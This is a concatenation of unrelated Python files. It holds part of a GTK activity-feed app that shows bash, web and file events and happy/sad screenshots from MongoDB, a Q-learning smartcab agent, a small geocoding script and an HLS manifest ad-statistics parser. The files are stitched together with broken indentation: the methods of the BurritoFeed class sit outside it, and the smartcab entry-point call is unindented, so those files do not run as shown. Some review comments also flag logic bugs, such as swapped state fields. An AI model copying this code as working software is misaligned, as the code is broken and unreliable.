        proc_display.set_markup('<span underline="single" font_family="monospace" size="9000" foreground="#555555">%s</span>' % self.process_name)
        # Punt on this menu for now ...
        proc_popup_menu = create_proc_popup_menu()
        proc_display_box = create_clickable_event_box(proc_display, proc_popup_menu)
        proc_valign = create_alignment(proc_display_box, ptop=3, pbottom=4, pleft=1)
        file_event_body = gtk.VBox()
        file_event_body.pack_start(proc_valign)
        file_vbox = gtk.VBox()
        file_vbox.pack_start(self.header)
        file_vbox.pack_start(file_event_body)
        # show_all_local_widgets inspects locals(); keep widget locals intact
        show_all_local_widgets(locals())
        # assign these locals to instance vars after they've been shown ...
        self.widget = file_vbox
        self.events_vbox = file_event_body
        # Key: filename
        # Value: FileFeedEvent.FileEventDisplay object
        self.contents = {}
    def add_file_evt_chron_order(self, file_provenance_event):
        """Append a file event assumed to be at least as new as everything
        shown so far; an existing entry for the same filename is replaced."""
        # since we're presumably inserting in chronological order,
        # then update the timestamp when inserting each comment in
        # succession, even if it's already in the collection
        #
        # loosened the '>' comparison to '>=' to handle some corner cases:
        assert not self.timestamp or file_provenance_event.timestamp >= self.timestamp
        self.timestamp = file_provenance_event.timestamp
        self.update_timestamp()
        fn = file_provenance_event.filename
        # de-dup by removing existing widget for this filename (if it exists)
        try:
            existing_widget = self.contents[fn].get_widget()
            self.events_vbox.remove(existing_widget)
        except KeyError:
            pass
        # ALWAYS add the latest entry (so we can have an up-to-date timestamp) ...
        n = FileFeedEvent.FileEventDisplay(file_provenance_event, self)
        self.contents[fn] = n
        self.events_vbox.pack_start(n.get_widget(), expand=True)
# represents a file 'read' event (either a read or the source of a
# rename operation) by a particular process
class FileObservedFeedEvent(FileFeedEvent):
    """Feed entry for file reads (or rename sources) by one process."""
    def __init__(self, process_name, fvm):
        FileFeedEvent.__init__(self, process_name, fvm,
                               "magnifying-glass.png")
# represents a file-mutated event in the feed (either a write or the
# target of a rename operation), whereby one or more files are being
# mutated by a particular process (either active or exited).
class FileMutatedFeedEvent(FileFeedEvent):
    """Feed entry for file writes (or rename targets) by one process."""
    def __init__(self, process_name, fvm):
        FileFeedEvent.__init__(self, process_name, fvm,
                               "media-floppy.png")
class BurritoFeed:
def create_status_pane(self):
    """Build the top pane: happy/sad face buttons plus the status-update
    text box and its 'Post' button; returns the assembled vbox.

    Side effects: stores the text view in self.status_input and resets
    self.most_recent_status_str.
    """
    happy_img = gtk.Image()
    happy_img.set_from_file("yellow-happy-face.xpm")
    happy_face = gtk.Button()
    happy_face.add(happy_img)
    happy_face.set_relief(gtk.RELIEF_HALF)
    happy_face.connect('clicked', self.happy_face_button_clicked)
    sad_img = gtk.Image()
    sad_img.set_from_file("red-sad-face.xpm")
    sad_face = gtk.Button()
    sad_face.add(sad_img)
    sad_face.set_relief(gtk.RELIEF_HALF)
    sad_face.connect('clicked', self.sad_face_button_clicked)
    happy_sad_face_pane = gtk.HBox()
    happy_sad_face_pane.pack_start(happy_face, expand=True, fill=True, padding=15)
    happy_sad_face_pane.pack_end(sad_face, expand=True, fill=True, padding=15)
    su_input = gtk.TextView()
    su_input.set_wrap_mode(gtk.WRAP_WORD)
    su_input.set_left_margin(3)
    su_input.set_right_margin(3)
    # add a thin gray border around the text input box:
    su_input.set_border_width(1)
    su_input.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color('#bbbbbb'))
    # I dunno how to set the number of displayed rows, so I just did a
    # hack and set the requested size to be something fairly small ...
    su_input.set_size_request(0, 50)
    sw = gtk.ScrolledWindow()
    sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
    sw.add(su_input)
    status_update_pane = gtk.VBox()
    status_update_pane.pack_start(sw, padding=3)
    su_post_button = gtk.Button(" Post ")
    su_post_button.connect('clicked', self.post_button_clicked)
    l = gtk.Label("What's on your mind?")
    l.set_alignment(0, 0.5)
    post_pane = gtk.HBox()
    post_pane.pack_start(l, expand=True, fill=True)
    post_pane.pack_end(su_post_button, expand=False, fill=False)
    status_update_pane.pack_start(post_pane, padding=2)
    status_pane = create_vbox((happy_sad_face_pane, status_update_pane), (5, 0))
    # show_all_local_widgets inspects locals(); keep widget locals intact
    show_all_local_widgets(locals())
    su_input.grab_focus() # do this as late as possible
    # kinda impure, but whatever ...
    self.status_input = su_input
    self.most_recent_status_str = None # to prevent accidental multiple-clicks
    return status_pane
def __init__(self, cur_session):
    """Build the feed window, connect to MongoDB, and initialize the
    incremental-polling state."""
    self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
    self.window.connect("destroy", lambda w: gtk.main_quit())
    self.cur_session = cur_session # unique session ID
    self.window.set_title("Activity Feed")
    self.window.set_icon_from_file("yellow-happy-face.xpm")
    self.window.set_border_width(5)
    vpane = gtk.VBox()
    self.window.add(vpane)
    self.status_pane = self.create_status_pane()
    feed_pane = gtk.ScrolledWindow()
    feed_pane.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
    feed_vbox = gtk.VBox()
    vp = gtk.Viewport()
    vp.add(feed_vbox)
    vp.set_shadow_type(gtk.SHADOW_NONE)
    vp.set_size_request(int((WINDOW_WIDTH * 2.0) / 3), 20) # limit its width
    set_white_background(vp)
    feed_pane.add(vp)
    hs = gtk.HSeparator()
    vpane.pack_start(self.status_pane, expand=False, padding=5)
    vpane.pack_start(hs, expand=False, padding=3)
    vpane.pack_start(feed_pane, expand=True) # fill up the rest of the vbox!
    # move window to left side and make it as tall as the desktop
    self.window.move(0, 0)
    #_w, _h = self.window.get_size()
    self.window.resize(WINDOW_WIDTH, self.window.get_screen().get_height())
    set_white_background(self.window)
    # show_all_local_widgets inspects locals(); keep widget locals intact
    show_all_local_widgets(locals())
    self.window.show() # show the window last
    self.feed_vbox = feed_vbox
    self.feed_events = [] # each element is an instance of a FeedEvent subclass
    # MongoDB stuff
    c = Connection()
    self.db = c.burrito_db
    # we want to incrementally update events in a 'sandwiched' time
    # range between prev_db_last_updated_time and cur_db_last_updated_time
    self.prev_db_last_updated_time = None
    self.cur_db_last_updated_time = None
    # for making sure we always fetch fresh new FileProvenanceEvent objects
    # each elt is the return value from FileProvenanceEvent.get_unique_id()
    self.file_events_seen = set()
    self.first_time = True
    # for managing NILFS file versions:
    self.fvm = FileVersionManager()
# returns a list of BashCommandEvent objects
def fetch_new_bash_events(self):
    """Return BashCommandEvent objects for this session.

    When a previous poll time exists, restricts the query to documents
    at or after that time (the window deliberately overlaps the previous
    epoch).
    """
    db_bash_collection = self.db.apps.bash
    criteria = {"session_tag": self.cur_session}
    if self.prev_db_last_updated_time:
        # tricky tricky ... start looking from the PREVIOUS epoch
        criteria["_id"] = {"$gte": self.prev_db_last_updated_time}
    events = []
    for doc in db_bash_collection.find(criteria):
        evt = fetch_bash_command_event(doc)
        if evt:
            events.append(evt)
    return events
# returns a list of WebpageVisitEvent objects
def fetch_new_webpage_events(self):
    """Return WebpageVisitEvent objects for this session.

    When a previous poll time exists, restricts the query to documents
    at or after that time (the window deliberately overlaps the previous
    epoch).
    """
    db_gui_collection = self.db.gui_trace
    criteria = {"session_tag": self.cur_session}
    if self.prev_db_last_updated_time:
        # tricky tricky ... start looking from the PREVIOUS epoch
        criteria["_id"] = {"$gte": self.prev_db_last_updated_time}
    events = []
    for doc in db_gui_collection.find(criteria):
        evt = fetch_webpage_visit_event(doc)
        if evt:
            events.append(evt)
    return events
def fetch_new_file_events(self):
    """Pull new, de-duplicated FileProvenanceEvent objects from MongoDB.

    Queries the process trace (projecting only pid/uid/phases), expands each
    process document into its file-provenance events, and filters out any
    event whose unique id was already seen in a previous poll.
    """
    projection = {'pid': 1, 'uid': 1, 'phases': 1}
    criteria = {"session_tag": self.cur_session}
    if self.prev_db_last_updated_time:
        # tricky tricky ... start looking from the PREVIOUS epoch
        criteria["most_recent_event_timestamp"] = \
            {"$gte": self.prev_db_last_updated_time}
    fresh = []
    for doc in self.db.process_trace.find(criteria, projection):
        for evt in fetch_file_prov_event_lst(doc, self.cur_session):
            uid = evt.get_unique_id()
            if uid in self.file_events_seen:
                continue  # de-dup!!!
            self.file_events_seen.add(uid)
            fresh.append(evt)
    return fresh
def fetch_new_status_update_events(self):
    """Return top-level annotation events, but ONLY on the very first poll.

    Subsequent polls return an empty list.
    """
    if not self.first_time:
        return []
    return fetch_toplevel_annotation_events(self.cur_session)
def poll_for_all_event_updates(self):
    """Fetch all new events since the last poll and weave them into the feed.

    Pulls bash, webpage, file-provenance, and status-update event streams,
    sorts them chronologically, then either coalesces each event into an
    existing feed entry or pushes a brand-new one.

    NOTE(review): this method reads and writes the module-level dicts
    `sorted_write_events` and `file_read_timestamps` (defined outside this
    view) -- confirm their initialization before refactoring.
    """
    bash_events = self.fetch_new_bash_events()
    web_events = self.fetch_new_webpage_events()
    file_events = self.fetch_new_file_events()
    status_update_events = self.fetch_new_status_update_events()
    db_bash_collection = self.db.apps.bash  # NOTE(review): appears unused here
    print datetime.datetime.now()
    print '# bash events:', len(bash_events)
    print '# web events:', len(web_events)
    print '# file events:', len(file_events)
    print '# status events :', len(status_update_events)
    print
    # status updates are only fetched on the first poll; clear the flag now
    self.first_time = False
    # Now "weave" together all streams of event updates:
    all_events = bash_events + web_events + file_events + status_update_events
    all_events.sort(key=lambda e:e.timestamp) # chronologically
    new_doodle_feed_events = []
    last_feed_event = None
    for evt in all_events:
        if self.feed_events:
            last_feed_event = self.feed_events[-1]
        if evt.__class__ == BashCommandEvent:
            # consecutive bash commands in the same working directory are
            # grouped into a single BashFeedEvent
            if (last_feed_event and \
                last_feed_event.__class__ == BashFeedEvent and \
                last_feed_event.pwd == evt.pwd):
                last_feed_event.add_command_chron_order(evt)
            else:
                n = BashFeedEvent(evt.pwd)
                n.add_command_chron_order(evt)
                self.push_feed_event(n)
        elif evt.__class__ == WebpageVisitEvent:
            # consecutive webpage visits collapse into one WebpageFeedEvent
            if (last_feed_event and \
                last_feed_event.__class__ == WebpageFeedEvent):
                last_feed_event.add_webpage_chron_order(evt)
            else:
                n = WebpageFeedEvent()
                n.add_webpage_chron_order(evt)
                self.push_feed_event(n)
        elif evt.__class__ == DoodleSaveEvent:
            # copy-and-paste from FileWriteEvent
            # NOTE(review): strict '<' here vs. '<=' in the FileWriteEvent
            # branch below -- confirm whether the asymmetry is intentional.
            if evt.filename in sorted_write_events:
                assert sorted_write_events[evt.filename][-1].timestamp < evt.timestamp
            else:
                sorted_write_events[evt.filename] = []
            sorted_write_events[evt.filename].append(evt)
            n = DoodleFeedEvent(evt, self.fvm)
            self.push_feed_event(n)
            # thumbnail loading is deferred until the end of this method
            new_doodle_feed_events.append(n)
        elif evt.__class__ == FileWriteEvent:
            if evt.filename in sorted_write_events:
                assert sorted_write_events[evt.filename][-1].timestamp <= evt.timestamp
            else:
                sorted_write_events[evt.filename] = []
            sorted_write_events[evt.filename].append(evt)
            # First try to coalesce with last_feed_event, regardless of its timestamp ...
            # (unless it's frozen)
            if (last_feed_event and \
                last_feed_event.__class__ == FileMutatedFeedEvent and \
                last_feed_event.process_name == evt.phase_name and \
                not last_feed_event.frozen):
                # except if there's a read barrier!
                last_read_time = None
                try:
                    last_read_time = file_read_timestamps[evt.filename]
                except KeyError:
                    pass
                if not last_read_time or last_read_time <= evt.timestamp:
                    last_feed_event.add_file_evt_chron_order(evt)
                    #print 'C:', evt.phase_name, evt.filename
                    continue # move along!
            # Process coalescing heuristic: try to go back FIVE SECONDS in
            # the feed to see if there are any matching events with the same
            # process name, and if so, coalesce evt into that process's
            # feed entry.
            #
            # The rationale for this heuristic is that when you're running a
            # ./configure or make compile job, there are often several
            # related 'friend' processes such as cc1/as, sed/grep/cat, etc.
            # that run very quickly back-and-forth, so if you don't
            # coalesce, then you would create a TON of separate
            # FileMutatedFeedEvent instances, when in fact the multiple
            # invocations could be grouped into one instance. e.g., if you
            # didn't coalesce, you would get something like:
            #   [cc1, as, cc1, as, cc1, as, cc1, as, cc1, as ...]
            # but if you coalesce, you get something much cleaner:
            #   [cc1, as]
            coalesced = False
            for cur_feed_elt in gen_reverse_bounded_time_elts(self.feed_events, evt.timestamp - FIVE_SECS):
                # VERY IMPORTANT! If there is an intervening read of THIS
                # PARTICULAR FILE, then break right away, because we don't want
                # to coalesce writes beyond read barriers
                try:
                    last_read_time = file_read_timestamps[evt.filename]
                    if last_read_time > cur_feed_elt.timestamp:
                        break
                except KeyError:
                    pass
                if (cur_feed_elt.__class__ == FileMutatedFeedEvent and \
                    cur_feed_elt.process_name == evt.phase_name):
                    if not cur_feed_elt.frozen:
                        cur_feed_elt.add_file_evt_chron_order(evt)
                        coalesced = True
                    # exit loop after the first FileMutatedFeedEvent regardless
                    # of whether it's been frozen
                    break
            # fallback is to create a new FileMutatedFeedEvent
            if not coalesced:
                n = FileMutatedFeedEvent(evt.phase_name, self.fvm)
                n.add_file_evt_chron_order(evt)
                self.push_feed_event(n)
        elif evt.__class__ == FileReadEvent:
            # add a "read barrier" to prevent write coalescing
            # over-optimizations
            file_read_timestamps[evt.filename] = evt.timestamp
        elif evt.__class__ == StatusUpdateEvent:
            n = StatusUpdateFeedEvent(evt)
            self.push_feed_event(n)
        elif evt.__class__ == HappyFaceEvent:
            n = HappyFaceFeedEvent(evt)
            self.push_feed_event(n)
        elif evt.__class__ == SadFaceEvent:
            n = SadFaceFeedEvent(evt)
            self.push_feed_event(n)
        else:
            # unknown event type: dump it and die loudly
            print evt
            assert False
    # defer loading of thumbnails until ALL DoodleFeedEvent instances
    # have been processed, since that's the only way we can ensure that
    # the proper versions of the files are loaded for the thumbnails
    for d in new_doodle_feed_events:
        d.load_thumbnail()
def push_feed_event(self, evt):
    """Append evt to the feed, render its widget, and refresh timestamps."""
    self.feed_events.append(evt)
    widget = evt.get_widget()
    # pack_end places new entries at the TOP of the feed
    self.feed_vbox.pack_end(widget, expand=False, padding=6)
    self.update_all_timestamps()
def update_all_timestamps(self):
    """Refresh the displayed timestamp of every event in the feed."""
    for feed_evt in self.feed_events:
        feed_evt.update_timestamp()
def post_button_clicked(self, widget):
    """'Post' button handler: publish the typed status update to the feed.

    Empty text and an exact repeat of the previous post are ignored
    (guards against accidental multiple submits).
    """
    text_buf = self.status_input.get_buffer()
    text = text_buf.get_text(*text_buf.get_bounds())
    if not text or text == self.most_recent_status_str:
        return
    self.most_recent_status_str = text  # to prevent accidental multiple-submits
    feed_evt = StatusUpdateFeedEvent(
        StatusUpdateEvent(text, datetime.datetime.now(), self.cur_session))
    self.push_feed_event(feed_evt)
    feed_evt.save_to_db()  # very important!!!
def happy_face_button_clicked(self, widget):
    # 'Happy face' button: record a happy snapshot via the shared dialog.
    self.commit_handler(widget, True)
def sad_face_button_clicked(self, widget):
    # 'Sad face' button: record a sad snapshot via the shared dialog.
    self.commit_handler(widget, False)
def commit_handler(self, widget, is_happy):
    """Pop up a modal dialog asking why the user is happy/sad.

    On OK with a non-empty message, records a commit event (which also
    takes a screenshot -- see push_commit_event). The dialog is destroyed
    BEFORE the screenshot so it does not appear in it.
    """
    if is_happy:
        state = 'happy'
    else:
        state = 'sad'
    label = gtk.Label("What just made you %s?" % state)
    # multi-line text entry for the commit message
    ci = gtk.TextView()
    ci.set_wrap_mode(gtk.WRAP_WORD)
    ci.set_border_width(1)
    ci.set_left_margin(3)
    ci.set_right_margin(3)
    ci.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color('#999999'))
    ci.modify_font(pango.FontDescription("sans 10"))
    sw = gtk.ScrolledWindow()
    sw.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)
    sw.add(ci)
    sw.set_size_request(350, 150)
    dialog = gtk.Dialog("%s snapshot" % state,
                        None,
                        gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
                        (gtk.STOCK_CANCEL, gtk.RESPONSE_REJECT,
                         gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))
    dialog.vbox.pack_start(label, expand=False, padding=8)
    dialog.vbox.pack_start(sw, expand=False)
    # move dialog to where the mouse pointer is
    rootwin = widget.get_screen().get_root_window()
    x, y, mods = rootwin.get_pointer()
    dialog.move(x, y)
    show_all_local_widgets(locals())
    response = dialog.run()
    # get text before destroying the dialog
    buf = ci.get_buffer()
    msg_str = buf.get_text(*buf.get_bounds())
    dialog.destroy() # destroy the dialog first so it doesn't show up in screenshot
    if response == gtk.RESPONSE_ACCEPT: # 'OK' button pressed
        # don't allow empty commit messages
        if msg_str:
            self.push_commit_event(msg_str, is_happy)
def push_commit_event(self, msg_str, is_happy):
    """Take a screenshot, then push and persist a happy/sad feed event.

    msg_str  -- the user's commit message (caller guarantees non-empty)
    is_happy -- True for a happy-face event, False for a sad-face event
    """
    now = get_ms_since_epoch()
    now_dt = encode_datetime(now)
    prefix = 'happy' if is_happy else 'sad'
    output_filename = os.path.join(SCREENSHOTS_DIR,
                                   'screenshot-%s.%d.png' % (prefix, now))
    save_screenshot(output_filename)
    if is_happy:
        n = HappyFaceFeedEvent(HappyFaceEvent(msg_str, now_dt,
                                              self.cur_session, output_filename))
    else:
        n = SadFaceFeedEvent(SadFaceEvent(msg_str, now_dt,
                                          self.cur_session, output_filename))
    # BUG FIX: this previously called the module-level singleton via
    # 'bff.push_feed_event(n)', needlessly coupling the method to a global
    # (and breaking any second instance); push through self instead.
    self.push_feed_event(n)
    n.save_to_db() # very important!!!
def timer_interrupt(self):
    """Periodic poll: advance the update epoch and pull new events.

    Reads the session's last_updated_time from MongoDB; when it has moved,
    shifts the (prev, cur) epoch window forward and polls for new events
    in the sandwiched range. Returns True so gobject.timeout_add keeps
    firing this timer.
    """
    # update BEFORE polling for events
    db_last_updated_time = None
    e = self.db.session_status.find_one({'_id': self.cur_session})
    if e:
        db_last_updated_time = e['last_updated_time']
    if db_last_updated_time != self.cur_db_last_updated_time:
        if self.cur_db_last_updated_time:
            # the DB timestamp must only move forward
            assert db_last_updated_time > self.cur_db_last_updated_time
        self.prev_db_last_updated_time = self.cur_db_last_updated_time
        self.cur_db_last_updated_time = db_last_updated_time
        #print 'Prev:', self.prev_db_last_updated_time
        #print 'Cur: ', self.cur_db_last_updated_time
        #print
        self.poll_for_all_event_updates()
        self.update_all_timestamps()
        # now we've presumably pulled all MongoDB events up to
        # self.prev_db_last_updated_time, so push it forward:
        self.prev_db_last_updated_time = self.cur_db_last_updated_time
    return True # to keep timer interrupts firing
def main(self):
    # Enter the GTK main loop; blocks until the application quits.
    gtk.main()
def exit_handler():
    # atexit hook: persist memoized checkpoints and unmount all NILFS
    # snapshots on the global feed instance before the process exits.
    global bff
    bff.fvm.memoize_checkpoints()
    bff.fvm.unmount_all_snapshots()
if __name__ == "__main__":
    # Session tag comes from argv[1], or falls back to the current-session
    # marker under /var/log/burrito.
    if len(sys.argv) > 1:
        cur_session = sys.argv[1]
    else:
        # if you don't pass in an argument, then use the CONTENTS of
        # /var/log/burrito/current-session as the session tag
        # NOTE(review): os.readlink returns the symlink TARGET, not file
        # contents -- presumably current-session is a symlink; confirm.
        cur_session = os.readlink('/var/log/burrito/current-session').strip()
    assert cur_session[-1] != '/' # don't have a weird trailing slash!
    SCREENSHOTS_DIR = '/var/log/burrito/%s/' % cur_session
    assert os.path.isdir(SCREENSHOTS_DIR)
    # have tooltips pop up fairly quickly
    gtk.settings_get_default().set_long_property('gtk-tooltip-timeout', 300, '')
    bff = BurritoFeed(cur_session)
    atexit.register(exit_handler)
    signal(SIGTERM, lambda signum,frame: exit(1)) # trigger the atexit function to run
    bff.timer_interrupt() # call it once on start-up
    # then poll MongoDB for new events every 5 seconds
    gobject.timeout_add(5000, bff.timer_interrupt)
    bff.main() # infinite loop!!!
|
import random
import numpy as np
from environment import Agent, Environment
from planner import RoutePlanner
from simulator import Simulator
n_trials = 200 # Sets number of trials
class LearningAgent(Agent):
    """An agent that learns to drive in the smartcab world via Q-learning."""
    def __init__(self, env):
        # sets self.env = env, state = None, next_waypoint = None,
        # and a default color
        super(LearningAgent, self).__init__(env)
        self.color = 'red' # override color
        self.planner = RoutePlanner(self.env,self) # simple route planner to
                                                   # get next waypoint
        # TODO: Initialize any additional variables here
        self.Q_table = {}   # maps (state, action) -> learned Q value
        self.alpha = 0.2 # Tune alpha for use in Bellman Equation
        self.gamma = 0.2 # Tune gamma for use in Bellman Equation
        self.failures = 0        # deadline misses counted in the 2nd half of trials
        self.illegal_actions = 0 # penalized moves counted in the 2nd half of trials
        self.trial = 0
        self.reward = 0
    def reset(self, destination=None):
        # Prepare for a new trip: re-route and reset per-trial counters.
        self.planner.route_to(destination)
        # TODO: Prepare for a new trip; reset any variables here, if required
        self.trial += 1
        self.reward = 0
    def update(self, t):
        """One simulation step: sense, choose an action (epsilon-greedy),
        act, and update the Q-table."""
        # Gather inputs
        self.next_waypoint = self.planner.next_waypoint() # from route planner,
                                                          # also displayed by simulator
        inputs = self.env.sense(self)
        deadline = self.env.get_deadline(self)
        # NOTE(review): 'float(n_trials / 2)' here vs 'float(n_trials) / 2'
        # below -- same value for even n_trials under Python 2, but the
        # inconsistency is fragile; confirm intent.
        if self.trial > (float(n_trials / 2)):
            if deadline == 0: # add up failures for performance metric
                self.failures += 1
        epsilon = float(1) / self.trial # epsilon decays over time so
        # it is more exploratory at the beginning and is less so later on
        print "Epsilon:", epsilon
        # TODO: Update state
        self.state = (inputs['light'], inputs['oncoming'], inputs['left'],
                      inputs['right'], self.next_waypoint)
        print "State:", self.state
        # NOTE(review): encountered_states is recreated locally every call
        # and immediately contains self.state, so the 'if self.state in
        # encountered_states' test below is always True and its else branch
        # is dead code.
        encountered_states = set()
        encountered_states.add(self.state)
        # TODO: Select action according to your policy
        if self.state in encountered_states:
            if random.random() >= epsilon or self.trial > (float(n_trials) / 2):
                # choose best action if random number is greater than
                # epsilon, unless after trial 100
                options = {action: self.Q_table.get((self.state, action), 0) for
                           action in self.env.valid_actions} # get the
                # options for each action for the given state from the
                # Q_table or impute 0
                print "Possible Actions:", options
                max_action = [action for action in self.env.valid_actions if
                              options[action] == max(options.values())]
                print "Best Action(s):", max_action
                # At start, there may be several options with equal scores.
                # Random option is then selected.
                action = max_action[0] # If a tie, an action of 'None' will get
                # the first choice as we are prioritizing safety
            else: # choose random option
                action = random.choice(self.env.valid_actions)
                print "Random Option Chosen!"
        else:
            action = random.choice(self.env.valid_actions)
            print "Random Option Chosen!"
        # Execute action and get reward
        reward = self.env.act(self, action)
        if self.trial >= float(n_trials) / 2:
            if reward == -1.0 or reward == 11.0:
                # illegal moves can return only those scores
                self.illegal_actions += 1
        # TODO: Learn policy based on state, action, reward
        # Bellman Equation: Q(s, a) = Q(s, a) + alpha(reward + gamma * maxQ(
        # s+1, a) - Q(s, a))
        # Learning Policy
        old_value = self.Q_table.get((self.state, action), 0)
        next_state = self.env.sense(self)
        next_waypoint = self.planner.next_waypoint()
        # NOTE(review): state_prime orders (..., right, left, ...) while
        # self.state orders (..., left, right, ...) -- the swapped fields
        # look like a bug; confirm before relying on learned values.
        state_prime = (next_state['light'], next_state['oncoming'], next_state[
            'right'], next_state['left'], next_waypoint)
        utility_of_next_state = self.Q_table.get((state_prime, action), 0)
        utility_of_state = reward + self.gamma * utility_of_next_state - \
            old_value
        # Q-table Gets Updated
        self.Q_table[(self.state, action)] = self.Q_table.get((self.state,
                                                               action),
                                                              0) + self.alpha\
            * utility_of_state
        print "LearningAgent.update(): deadline = {}, inputs = {}, action = {" \
              "}, reward = {}".format(deadline, inputs, action, reward)
        print
    def performance(self):
        # Report metrics over the SECOND half of the trials only (the first
        # half is treated as the exploration/learning phase).
        print "Destination Reached Rate = {}".format(float((n_trials / 2) -
                                                           self.failures) /
                                                     (n_trials / 2))
        print "Illegal Moves per Trial = {}".format(float(
            self.illegal_actions) / (n_trials / 2))
def run():
    """Run the agent for a finite number of trials."""
    # Environment comes with some dummy traffic already in it.
    env = Environment()
    agent = env.create_agent(LearningAgent)
    # Track this agent. Set enforce_deadline=False while debugging to
    # allow longer trials.
    env.set_primary_agent(agent, enforce_deadline=True)
    # Simulator uses pygame when display=True (if available); keep
    # update_delay at 0 and display off so the run finishes quickly.
    sim = Simulator(env, update_delay=0, display=False)
    # To quit midway, press Esc, close the pygame window, or hit Ctrl+C.
    sim.run(n_trials=n_trials)
    agent.performance()
if __name__ == '__main__':
run() |
# Geocode a list of road-trip destinations and print their lat-long
# coordinates. Fixes: the import was buried mid-script after the data, and
# leftover scaffold comments ("Declare destinations list here", etc.)
# described code that had already run.
import geocoder

# Destinations to look up, in itinerary order.
destinations = [
    "Space Needle",
    "Crater Lake",
    "Golden Gate Bridge",
    "Yosemite National Park",
    "Las Vegas, Nevada",
    "Grand Canyon National Park",
    "Aspen, Colorado",
    "Mount Rushmore",
    "Yellowstone National Park",
    "Sandpoint, Idaho",
    "Banff National Park",
    "Capilano Suspension Bridge",
]

# Resolve each place name via the ArcGIS geocoding service and print the
# name alongside its [latitude, longitude] pair.
for point in destinations:
    g = geocoder.arcgis(point)
    print(point, " is located at ", g.latlng)
# -*- coding=utf-8 -*-
# author: yanyang.xie@thistech.com
import os
import re
class ManifestPaser(object):
    """Parse an HLS manifest and collect ad / entertainment ts statistics.

    NOTE(review): the class name has a typo ("Paser" -> "Parser"), but it is
    kept because subclasses and callers reference it by this name.
    """
    def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_', provider_tag = 'ProviderId'):
        # raw manifest text and the URL it was fetched from
        self.manifest = manifest
        self.request_url = request_url
        # markers used while scanning manifest lines
        self.psn_tag = psn_tag
        self.ad_tag = ad_tag
        self.sequence_tag = sequence_tag
        self.asset_id_tag = asset_id_tag
        self.provider_tag = provider_tag
        # accumulated statistics, filled in by parse()
        self.ad_ts_number = 0
        self.ad_pre_number = 0
        self.ad_post_number = 0
        self.ad_mid_number = 0
        self.ad_mid_position_list = []
        self.ad_url_list=[]
        self.sequence_number = 0
        self.has_asset_id = False
        self.entertainment_ts_number = 0
        # maps entertainment-ts index -> PSN tracking id
        self.psn_tracking_position_id_dict = {}
    def parse(self):
        """Scan the manifest line by line, classifying each .ts segment as
        pre-roll / mid-roll / post-roll ad or entertainment content."""
        self.asset_id = self.extract_asset_id(self.request_url)
        if self.asset_id is None:
            self.has_asset_id = False
        # NOTE(review): if asset_id is None, line.find(self.asset_id) below
        # would raise TypeError -- presumably the URL always carries a
        # ProviderId; confirm.
        manifest_list = self.manifest.split('\n')
        entertainment_ts_index, tmp_index = 0, 0
        for line in manifest_list:
            line = line.strip()
            if line == '':
                continue
            if line.find(self.sequence_tag) >= 0:
                # e.g. '#EXT-X-MEDIA-SEQUENCE:18' -> 18
                self.sequence_number = int(line.rsplit(':')[-1].strip('\r'))
                continue
            if self.has_asset_id is not True and line.find(self.asset_id) > 0:
                self.has_asset_id = True
            if self.psn_tag is not None and line.find(self.psn_tag) > -1:
                trackingId = self.extract_psn_tracking_id(line)
                if trackingId != '':
                    self.psn_tracking_position_id_dict[entertainment_ts_index] = trackingId
            elif line.find('.ts') > 0:
                if line.find(self.ad_tag) > -1:
                    self.ad_ts_number += 1
                    self.ad_url_list.append(line)
                    if entertainment_ts_index < 1:
                        # not found entertainment ts, should be preroll ad
                        self.ad_pre_number += 1
                    else:
                        # mid or post roll ad. Record ad ts number and started postion
                        # We can't yet tell whether this ad is mid-roll or
                        # post-roll; assume post-roll for now.
                        tmp_index = entertainment_ts_index
                        self.ad_post_number += 1
                elif line.find(self.asset_id_tag) > -1:
                    self.entertainment_ts_number += 1
                    entertainment_ts_index += 1
                    if self.ad_post_number > 0:
                        # Seeing an entertainment ts after ads proves the
                        # previously recorded ads were mid-roll: record the
                        # mid-roll position and count, and reset the
                        # post-roll counter.
                        self.ad_mid_position_list.append(tmp_index)
                        self.ad_mid_number += self.ad_post_number
                        self.ad_post_number = 0
    def extract_psn_tracking_id(self, content):
        '''Get PSN tracking id (returns None implicitly when no match).'''
        p = r'\w*\W*ID=(.*),DURATION[\.\n]*'
        psn_info = re.findall(p, content)
        if psn_info is not None and len(psn_info) > 0:
            return psn_info[0]
    # retired path-based implementation, kept for reference:
    '''
    def extract_asset_id(self, url):
        flag = '/.*(%s.*)/' % (self.asset_id_tag)
        p = r'\w*\W*%s[\.\n]*' % (flag)
        t_info = re.findall(p, url)
        if t_info is not None and len(t_info) > 0:
            return t_info[0].split('/')[0]
        else:
            return None
    '''
    def extract_asset_id(self, url):
        """Extract the asset id from the request URL's ProviderId query
        parameter; returns None when the parameter is absent."""
        #re.findall(r'.*ProviderId=(.*?)\&.*', url)
        p = r'.*%s=(.*?)\&.*' %(self.provider_tag)
        t_info = re.findall(p, url)
        if t_info is not None and len(t_info) > 0:
            return t_info[0].split('/')[0]
        else:
            return None
class LinearManifestChecker(ManifestPaser):
    """Manifest checker for linear streams; parses eagerly on construction."""
    def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_'):
        super(LinearManifestChecker, self).__init__(manifest, request_url, psn_tag, ad_tag, sequence_tag, asset_id_tag)
        self.parse()
        self.ad_data_transform()
    def ad_data_transform(self):
        """Derive convenience flags from the raw ad counters."""
        # any pre-roll ad means the very first position is an ad
        self.ad_in_first_postion = self.ad_pre_number > 0
class CdvrManifestChecker(ManifestPaser):
    """Manifest checker for cDVR streams; parses eagerly on construction."""
    def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_'):
        super(CdvrManifestChecker, self).__init__(manifest, request_url, psn_tag, ad_tag, sequence_tag, asset_id_tag)
        self.parse()
        self.generate_ad_position_list()
    def generate_ad_position_list(self):
        """Fold pre-roll and post-roll ads into the mid-roll position list."""
